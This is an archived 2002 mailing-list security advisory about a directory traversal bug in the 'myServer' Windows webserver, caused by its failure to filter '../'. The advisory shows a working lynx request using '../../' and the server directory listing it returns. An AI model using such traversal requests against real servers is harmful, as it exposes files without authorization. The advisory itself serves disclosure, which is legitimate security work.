Directory traversing bug in 'myServer' webserver.

From: dong-h0un U (xploitat_private)
Date: Wed Dec 11 2002 - 06:57:46 PST

  • Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-SCO.44] UnixWare 7.1.1 Open UNIX 8.0.0 : uudecode performs inadequate checks on user-specified output files"

    	=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    	INetCop Security Advisory #2002-0x82-010
    	-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    	- Our 10th advisory does self-congratulation.
    
    
    * Title: Directory traversing bug in 'myServer' webserver.
    
    
    0x01. Description
    
    
    It's very useful Windows webserver that is offered by Binary of C++.
    It's run in Microsoft Windows platform fortunately only.
    They have plan to export Linux platform firstly at the future.
    
    We saved Linux. :-)
    
    Vulnerability happens because webserver does not filter "../".
    Herewith, vulnerability can do exploit.
    (Server has died sometimes. yeh~ It's bug!)
    
    
    0x02. Vulnerable Packages
    
    
    Vendor site: http://myserverweb.sourceforge.net/
    
    myserver 0.2 binaries
    -myServerEXEC-0.2.zip
    +Windows 95/98/2000
    +Windows NT/2000
    
    myserver 0.11 binaries
    -myServerEXEC-0.11.zip
    
    
    0x03. Exploit
    
    
    See and enjoy this.
    
    
    bash$ lynx -dump http://myServerhost/../../myServerEXEC-0.2 > x82-x0x
    bash$ cat x82-x0x
    
       Contents of folder ../../myServerEXEC-0.2/
         _________________________________________________________________
    
       File Last modify Size
       [1]cgi-lib 0/11/102-12:4:16 System time
       [2]control.exe 3/11/102-10:48:28 System time 258048 bytes
       [3]CVS 0/11/102-12:4:18 System time
       [4]languages 0/11/102-12:4:18 System time
       [5]libhoard.dll 3/9/102-6:0:0 System time 32843 bytes
       [6]logs 0/11/102-12:4:18 System time
       [7]MIMEtypes.txt 0/11/102-3:50:42 System time 276 bytes
       [8]myserver.exe 3/11/102-10:49:2 System time 200704 bytes
       [9]myserver.xml 0/11/102-1:11:46 System time 2238 bytes
       [10]readme.txt 0/11/102-9:59:6 System time 1836 bytes
       [11]REGISTER SERVICE.bat 3/9/102-6:0:0 System time 20 bytes
       [12]START CONSOLE.bat 3/9/102-6:0:0 System time 20 bytes
       [13]START SERVICE.bat 3/9/102-6:0:0 System time 17 bytes
       [14]STOP SERVICE.bat 3/9/102-6:0:0 System time 16 bytes
       [15]system 0/11/102-12:4:18 System time
       [16]UNREGISTER SERVICE.bat 3/9/102-6:0:0 System time 22 bytes
       [17]web 0/11/102-12:4:18 System time
         _________________________________________
    
       Running on myServer 0.2
    
    References
    
       1. http://myServerhost/myServerEXEC-0.2/cgi-lib
       2. http://myServerhost/myServerEXEC-0.2/control.exe
       3. http://myServerhost/myServerEXEC-0.2/CVS
       4. http://myServerhost/myServerEXEC-0.2/languages
       5. http://myServerhost/myServerEXEC-0.2/libhoard.dll
       6. http://myServerhost/myServerEXEC-0.2/logs
       7. http://myServerhost/myServerEXEC-0.2/MIMEtypes.txt
       8. http://myServerhost/myServerEXEC-0.2/myserver.exe
       9. http://myServerhost/myServerEXEC-0.2/myserver.xml
      10. http://myServerhost/myServerEXEC-0.2/readme.txt
      11. http://myServerhost/myServerEXEC-0.2/REGISTERSERVICE.bat
      12. http://myServerhost/myServerEXEC-0.2/STARTCONSOLE.bat
      13. http://myServerhost/myServerEXEC-0.2/STARTSERVICE.bat
      14. http://myServerhost/myServerEXEC-0.2/STOPSERVICE.bat
      15. http://myServerhost/myServerEXEC-0.2/system
      16. http://myServerhost/myServerEXEC-0.2/UNREGISTERSERVICE.bat
      17. http://myServerhost/myServerEXEC-0.2/web
    bash$
    
    
    We tested it, in Windows 98/2000 professionals.
    
    
    0x04. Patch
    
    
    --
    
    We decided it.
    
    It can solve as chroot() function.
    Therefore, we don't compose patch.
    
    Construct safer webserver.
    
    --
    
    P.S: Sorry, for my poor english.
    
    
    --
    By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
    
    MSN & E-mail: szoahc(at)hotmail(dot)com,
                  xploit(at)hackermail(dot)com
    
    INetCop Security Home: http://www.inetcop.org (Korean hacking game)
                 My World: http://x82.i21c.net
    
    GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
    --
    
    
    -- 
    _______________________________________________
    Get your free email from http://www.hackermail.com
    
    Powered by Outblaze
    



    This archive was generated by hypermail 2b30 : Wed Dec 11 2002 - 09:04:22 PST